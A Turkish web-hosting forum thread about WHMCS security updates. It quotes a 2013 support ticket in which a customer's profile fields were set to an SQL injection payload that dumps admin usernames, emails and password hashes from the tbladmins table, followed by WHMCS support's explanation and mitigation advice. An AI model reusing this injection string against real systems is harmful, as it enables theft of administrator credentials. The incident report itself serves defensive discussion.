• 14-12-2013, 11:41:37
    7th Oct 2013 (10:44)
    xxxxx || Müşteri
    Hi,

    One of our customers try to reset admin password. Is there any security open or bug to reset pasword by someone else ?

    -------------

    Client ID: 1840 - 1:xxx:xxxx@xxxxx.com:56d451d40fxxxxx2f49a3b49811c, 6:xxx:xxxx@xxxxx.com:adad59xxxxx8904325423b728, 19:xxx:xxxx@xxxxx.com:d0c35ecea08a8165xxx0438a6, 20:xxx:xxxx@xxxxx.com:adfa51cexxxx21e88 timson has requested to change his/her details as indicated below:

    Address 2: 'ero' to 'AES_ENCRYPT(1,1), firstname=((SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,pass word SEPARATOR 0x2c20) FROM tbladmins))'
    Default Payment Method: '' to ''

    If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details.

    ---------------

    Client ID: 1840 - jack timson has requested to change his/her details as indicated below:

    City: 'tokyo' to 'AES_ENCRYPT(1,1), firstname=((SELECT GROUP_CONCAT(id,0x3a,username,0x3a,email,0x3a,pass word SEPARATOR 0x2c20) FROM tbladmins))'
    Default Payment Method: '' to ''

    If you are unhappy with any of the changes, you need to login and revert them - this is the only record of the old details.

    -------------

    Regards.


    ----------------

    Biz yazdık bu yazıyı onlarda bize ne yazmış bakalım ticket tarihine dikkat edin


    --------------------------------

    Cevap bu bu ticketten 2 3 gün sonra ardı arkası kesilmeyen güncelelemeler çıktı her güncellemeden sonra bir sorun tekrar yazdık gene güncelleme ama allahı var anında cevap veriyorlar



    7th Oct 2013 (14:27)
    Lawrence || Yetkili
    Hi hakan,

    Based on the log entry you've provided, the attacker has only performed a SELECT statement. This particular statement exposes the administrator password hashes. These password hashes, in themselves, are not sufficient to allow the attacker to authenticate into your admin area. The attacker must have the plain text version of the original password (and therefore must find the text which equates to the same hash value as your password). These password hashes, in themselves, are not sufficient to allow the attacker to authenticate into your admin area.

    If the attacker is able to extract the true admin user password value, they would then need to also know the exact location of the admin login page as well as have access to load it. As described in our recommended further security steps, WHMCS provides an extra layer of protection to help mitigate the unauthorized access into the administrative area by allowing a custom admin folder path. We also recommend restricting IP access to that folder with an htaccess file.

    For more info please see our most recent blog post at <http://blog.whmcs.com/> http://blog.whmcs.com/

    If you require further assistance, please don't hesitate to let us know.

    Regards,

    Lawrence
    Customer Support
  • 23-12-2013, 20:51:43
    Sanırım yeni güncelleme daha çıktı.
  • 23-12-2013, 21:08:05
    DHS adlı üyeden alıntı: mesajı görüntüle
    Sanırım yeni güncelleme daha çıktı.
    yeni bir güncelleştirme dağıtılmış güncelleyen var mı ?
  • 23-12-2013, 21:10:47
    Tavsiyem hemen yükleyip rezil olmayın. Dünyada indirilsin feedbackler alınsın ondan sonra güncelleyin. (kritik güncellemeler olmadığı sürece).

    Aksi takdirde kabak ilk size patlar, whmcs ekibiyle arkadaş olursunuz.
  • 23-12-2013, 22:16:06
    Ben güncelledim sorun yok
    Hatta bir sorun vardı onu da çözmüşler.
    Admin içinde
    reports.php?report=new_customers&show=signups&show=orderscompleted
    Önceki güncellemede grafik bozulmuştu.
  • 23-12-2013, 22:21:37
    Güncellemeler yapıldı çünkü okadar çok açıkları deneyen kişiler türediki son zamanlarda hiçbirşeyi riske atamayız he panel bozulur backup geri dönersin ama hacklenmekden daha iyi birşeydir backup geridönmek.

    Whmcs ile arkadaş olursunuz diyer arkadaşım zaten son zamanlarda yeterince arkadaşlığı bırak akraba gibi olduk
  • 23-12-2013, 22:31:49
    Güncelleme yapıldı,bir probleme rastlamadım.
  • 14-01-2014, 20:15:58
    mişyın kompleyt
  • 21-01-2014, 16:46:56
    5.2.16 hayırlı olsun.